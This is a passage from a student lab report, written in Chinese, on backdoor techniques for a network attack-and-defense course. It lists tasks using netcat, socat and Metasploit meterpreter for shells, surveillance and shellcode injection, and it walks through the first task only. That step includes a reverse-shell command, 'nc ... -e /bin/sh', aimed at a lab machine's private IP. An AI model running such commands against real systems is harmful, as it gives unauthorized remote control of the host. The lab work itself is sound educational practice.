20192401 王麥齊 《網路與系統攻防技術》實驗二 後門原理與實踐
阿新 • • 發佈:2022-04-01
目錄
一、實驗內容
1、使用netcat和socat獲取主機操作Shell,以成功啟動某項任務作為實驗成功的標準;
2、使用MSF meterpreter(或其他軟體)生成可執行檔案,利用ncat或socat傳送到主機並執行獲取主機Shell;
3、使用MSF meterpreter(或其他軟體)生成獲取目標主機音訊、攝像頭、擊鍵記錄等內容,並嘗試提權;
4、使用MSF生成shellcode,注入到實踐1中的pwn1中,獲取反彈連線Shell。
二、實驗過程
實踐一:使用netcat獲取主機操作Shell
該實踐首先需要獲取Windows系統的ip地址,然後在windows的powershell(或者cmd等shell中)使用ncat的監聽模式,再連線到kali系統中即可。
(1)使用netcat獲取主機Shell,並cron啟動某項任務。
首先測試主機與Kali虛擬機器之間的連通性,如下圖所示:
kali與主機的連通性
主機與kali機的連通性
接下來輸入:
ncat.exe -l -p 8888 # 開啟監聽模式,監聽埠8888
開啟Kali系統的終端,輸入:
nc 192.168.43.201 8888 -e /bin/sh
# 把/bin/sh通過e引數繫結,並開啟監聽,那當我們使用遠端主機連線到這臺主機時,就相當於獲得了一個shell
如下圖,即可獲取Kali的shell,輸入命令可以正常執行:
測試傳遞資訊: